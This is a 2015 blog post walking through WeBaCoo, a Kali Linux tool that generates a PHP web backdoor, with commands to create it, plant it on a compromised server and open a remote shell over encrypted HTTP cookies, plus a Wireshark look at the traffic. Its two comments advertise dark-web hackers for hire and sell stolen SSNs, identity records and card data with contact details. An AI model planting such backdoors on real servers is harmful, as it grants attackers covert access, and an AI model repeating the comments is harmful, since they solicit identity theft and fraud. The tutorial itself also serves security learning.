Monday 15 June 2015

Web backdoor 'webacoo' in Kali Linux


A backdoor is any type of program that will allow a hacker to connect to a computer without going through the normal authentication process. If a hacker can get a backdoor program loaded on a computer, the hacker can then come and go at will. Backdoors generally use a covert communication channel to hide its communication from firewall and IDS.

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, which provides the hacker with a remote terminal on the web server and communicates  over HTTP. WeBaCoo uses HTTP cookies as a covert communication channel. The commands to be executed on the victim server and the response are sent using encrypted cookies in HTTP request and HTTP response headers.

WeBaCoo is a post exploitation tool. The hacker has to first gain access to the victim web server in order to upload the backdoor code.


On the Kali Linux machine,perform the following steps:

1) Generate  backdoor code
root@kali:~# webacoo -g -o backdoor.php

WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "backdoor.php" created.



2) Copy the file 'backdoor.php' to the compromised web server.


3) Connect to the compromised web server.
root@kali:~# webacoo -t -u http://meru.mycompany.com/backdoor.php

    WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
    Copyright (C) 2011-2012 Anestis Bechtsoudis
    { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Connecting to remote server as...
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.

webacoo$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0



On the Kali Linux machine, we capture the communication with the victim web server in 'Wireshark'. To configure Wireshark, select the Network Interface , and start capture. Set filter to http.

The below screen shot shows the HTTP request to the victim web server. We can see that the command to be executed on the victim is sent using an encrypted cookie. 






The below screen shot shows the HTTP response from the victim web server.
The output of the command executed on the victim is sent using an encrypted cookie.





2 comments:

  1. I have tested a few and the best hackers for hire on the dark web are the guys at dark web hackers, download Torbrowser and then go to this dark
    web site with Torbrowser:
    http://ziagmjbpt47drkrk.onion/

    ReplyDelete
  2. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete